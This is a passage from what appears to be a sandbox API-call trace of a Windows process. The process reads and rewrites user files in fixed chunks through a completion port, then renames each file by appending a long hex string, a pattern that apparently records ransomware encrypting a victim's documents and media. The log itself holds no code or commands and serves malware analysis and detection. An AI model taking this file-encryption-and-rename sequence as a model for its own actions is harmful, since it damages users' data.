lpOverlapped=0x24fff74) returned 1 [0122.570] WriteFile (in: hFile=0x318, lpBuffer=0x3360140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 0x0 [0122.613] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0122.620] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x32c9110, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x32c9110, ReturnLength=0x24fff70) returned 0x0 [0122.621] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6oJyejxtw_dKmNa.m4a", lpString2=".6AD1D54665C8DBAD39E29E329D5CBDD7277E1C65FA14DA520852371776F80000" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6oJyejxtw_dKmNa.m4a.6AD1D54665C8DBAD39E29E329D5CBDD7277E1C65FA14DA520852371776F80000") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6oJyejxtw_dKmNa.m4a.6AD1D54665C8DBAD39E29E329D5CBDD7277E1C65FA14DA520852371776F80000" [0122.621] GetProcessHeap () returned 0x600000 [0122.621] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x130) returned 0x6da938 [0122.621] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x24fff60, FileInformation=0x6da938, Length=0x130, FileInformationClass=0xa) returned 0x0 [0122.623] CloseHandle (hObject=0x320) returned 1 [0122.627] GetProcessHeap () returned 0x600000 [0122.627] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32c9060 | out: hHeap=0x600000) returned 1 [0122.630] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0122.853] ReadFile (in: hFile=0x32c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0122.860] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0122.921] ReadFile (in: hFile=0x324, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0122.923] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.395] ReadFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0123.397] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.400] WriteFile (in: hFile=0x308, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0123.400] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.581] ReadFile (in: hFile=0x324, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0123.603] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.604] WriteFile (in: hFile=0x320, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0123.604] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.616] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0123.616] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.623] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0123.624] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.630] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0123.630] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.637] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0123.637] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.644] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0123.644] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.650] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0123.650] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.657] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x7e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0123.657] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.668] WriteFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0123.669] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.677] WriteFile (in: hFile=0x304, lpBuffer=0x3360140, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 0x0 [0123.850] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.850] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x32c9110, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x32c9110, ReturnLength=0x24fff70) returned 0x0 [0123.850] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\JnATnk8TvNigHoXT.png", lpString2=".6F937B9B34BDBC4AEB4EE07624ECD0CB6CD9F0E8951629777DA71A8990220637" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\JnATnk8TvNigHoXT.png.6F937B9B34BDBC4AEB4EE07624ECD0CB6CD9F0E8951629777DA71A8990220637") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\JnATnk8TvNigHoXT.png.6F937B9B34BDBC4AEB4EE07624ECD0CB6CD9F0E8951629777DA71A8990220637" [0123.850] GetProcessHeap () returned 0x600000 [0123.850] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12c) returned 0x6f6668 [0123.850] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x24fff60, FileInformation=0x6f6668, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0123.860] CloseHandle (hObject=0x318) returned 1 [0123.860] GetProcessHeap () returned 0x600000 [0123.860] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32c9060 | out: hHeap=0x600000) returned 1 [0123.862] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.940] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x336e010, ReturnLength=0x24fff70) returned 0x0 [0123.945] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\UpEL XpeLrR2vLR.ods", lpString2=".A5BA56B8D5CA9144988C3E4B1BE11471D4AF3607FAFF359C8EF0A3852B3C2102" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\UpEL XpeLrR2vLR.ods.A5BA56B8D5CA9144988C3E4B1BE11471D4AF3607FAFF359C8EF0A3852B3C2102") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\UpEL XpeLrR2vLR.ods.A5BA56B8D5CA9144988C3E4B1BE11471D4AF3607FAFF359C8EF0A3852B3C2102" [0123.945] GetProcessHeap () returned 0x600000 [0123.945] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x120) returned 0x6f20b0 [0123.945] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x6f20b0, Length=0x120, FileInformationClass=0xa) returned 0x0 [0123.946] CloseHandle (hObject=0x31c) returned 1 [0123.946] GetProcessHeap () returned 0x600000 [0123.947] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0123.947] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.954] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.954] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.962] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 0x0 [0123.963] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.974] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.975] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0123.983] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.983] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.063] ReadFile (in: hFile=0x328, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.064] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.163] ReadFile (in: hFile=0x334, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.166] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.171] WriteFile (in: hFile=0x31c, lpBuffer=0x338e098, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 0x0 [0124.176] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.181] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0124.181] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.188] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.189] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.194] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.195] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.205] WriteFile (in: hFile=0x334, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x3400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.205] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.212] WriteFile (in: hFile=0x334, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.213] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.221] WriteFile (in: hFile=0x334, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.222] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.228] WriteFile (in: hFile=0x334, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.229] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.335] ReadFile (in: hFile=0x33c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.335] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.344] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.345] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.351] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.351] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.362] WriteFile (in: hFile=0x32c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.363] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.369] WriteFile (in: hFile=0x32c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.370] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.375] WriteFile (in: hFile=0x32c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.375] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.383] WriteFile (in: hFile=0x32c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.384] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.389] WriteFile (in: hFile=0x32c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.390] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.395] WriteFile (in: hFile=0x32c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.395] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.405] WriteFile (in: hFile=0x32c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.405] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0124.411] WriteFile (in: hFile=0x32c, lpBuffer=0x3360140*, 